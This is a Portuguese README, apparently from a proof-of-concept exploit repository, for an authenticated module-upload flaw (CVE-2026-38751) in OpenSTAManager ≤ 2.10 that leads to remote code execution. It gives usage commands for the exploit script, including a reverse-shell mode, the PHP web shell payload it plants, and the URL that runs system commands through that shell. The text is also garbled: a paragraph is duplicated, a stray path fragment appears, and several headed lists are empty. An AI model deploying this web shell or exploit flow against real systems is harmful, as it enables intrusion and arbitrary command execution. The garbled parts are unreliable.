
Este repositório contém um exploit de prova de conceito (PoC) para CVE-2026-38751, que afeta OpenSTAManager ≤ 2.10. A vulnerabilidade permite que um atacante autenticado envie um módulo malicioso através da funcionalidade de atualização de módulo, levando ao upload arbitrário de arquivos e execução remota de código (RCE).
Este repositório contém um exploit de prova de conceito (PoC) para CVE-2026-38751, afetando OpenSTAManager ≤ 2.10. A vulnerabilidade permite que um atacante autenticado faça upload de um módulo malicioso através da funcionalidade de atualização de módulos, resultando em upload arbitrário de arquivos e execução remota de código (RCE).
modules/aggiornamenti/upload_modules.php)A funcionalidade de atualização de módulos permite que usuários autenticados façam upload de módulos baseados em ZIP sem validação adequada do conteúdo do arquivo ou limites de execução. Um atacante pode criar um módulo malicioso contendo payloads PHP, que são então implantados na raiz web e executados através do contexto da aplicação. Isso resulta em:
##Impacto A exploração bem-sucedida permite:
python exploit.py --build
Cria:
update.zip
└── run/
├── MODULE
└── evil.php
python exploit.py <username> <password> <target_url>
Modo opcional de shell reverso:
python exploit.py <username> <password> <target_url> --lhost <IP> --lport <PORT>
Payload de Exemplo
<?php
isset($_GET['cmd']) && system($_GET['cmd']);
?>
Se bem-sucedido, o seguinte endpoint executa comandos do sistema:
/modules/run/evil.php?cmd=id
Este projeto é destinado a:
Não use contra sistemas sem permissão explícita.
Notas
A detecção pode variar dependendo da configuração do servidor. Algumas implantações podem desabilitar a execução direta de PHP em diretórios de módulos. O tempo de ativação do módulo pode exigir novas tentativas.
Agradecimentos